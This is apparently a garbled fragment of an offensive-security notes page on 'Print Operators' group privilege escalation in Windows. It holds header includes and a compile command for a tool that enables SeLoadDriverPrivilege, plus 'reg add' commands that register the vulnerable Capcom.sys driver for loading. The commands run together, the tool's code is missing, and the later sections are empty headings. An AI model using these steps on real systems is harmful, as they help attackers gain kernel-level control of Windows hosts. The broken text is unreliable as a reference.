print-operators
Print Operators
METHOD: 1 - GUI
#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cppreg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1METHOD: 2 - No GUI
Key Concept
Last updated